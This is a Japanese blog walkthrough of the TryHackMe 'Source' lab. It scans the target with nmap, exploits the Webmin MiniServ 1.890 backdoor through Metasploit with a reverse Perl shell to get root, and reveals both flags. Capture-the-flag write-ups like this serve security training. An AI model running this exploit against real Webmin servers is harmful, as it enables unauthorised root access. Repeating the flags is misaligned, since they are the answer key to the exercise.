0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?

【TryHackMe】Source:Walkthrough

Posted at

概要

TryHackMe「Source」のWalkthroughです。

Task1

Q1.user.txt

ポートスキャンを実行します。

$ nmap -Pn -T4 -A -sC -sV -p- 10.10.28.202 -oN nmap_result
PORT      STATE    SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
10000/tcp open     http    MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
|_http-server-header: MiniServ/1.890

ポートの稼働状況が分かりました。

ポート サービス バージョン
22 ssh OpenSSH 7.6p1
10000 http MiniServ 1.890

https://<ip>:10000にアクセスするとログイン画面が表示されました。

login.jpg

MiniServ 1.890で脆弱性情報を検索するとバックドアの脆弱性が見つかりました。

Metasploitlinux/http/webmin_backdoorモジュールを使用します。
オプションを設定します。

module option.jpg

実行するとrootアカウントのシェルを取得できました。

msf6 exploit(linux/http/webmin_backdoor) > exploit

[*] Started reverse TCP handler on 10.6.55.144:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (10.6.55.144:4444 -> 10.10.106.151:44934) at 2024-09-24 13:03:30 -0400

whoami
root

user.txtを検索します。

find / -name user.txt 2>/dev/null
/home/dark/user.txt

/home/dark/user.txtからユーザーフラグを入手できました。

/home/dark/user.txt
THM{SUPPLY_CHAIN_COMPROMISE}

A.THM{SUPPLY_CHAIN_COMPROMISE}

Q2.root.txt

/root/root.txtからルートフラグを入手できます。

/root/root.txt
THM{UPDATE_YOUR_INSTALL}

A.THM{UPDATE_YOUR_INSTALL}

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
0
0

Delete article

Deleted articles cannot be recovered.

Draft of this article would be also deleted.

Are you sure you want to delete this article?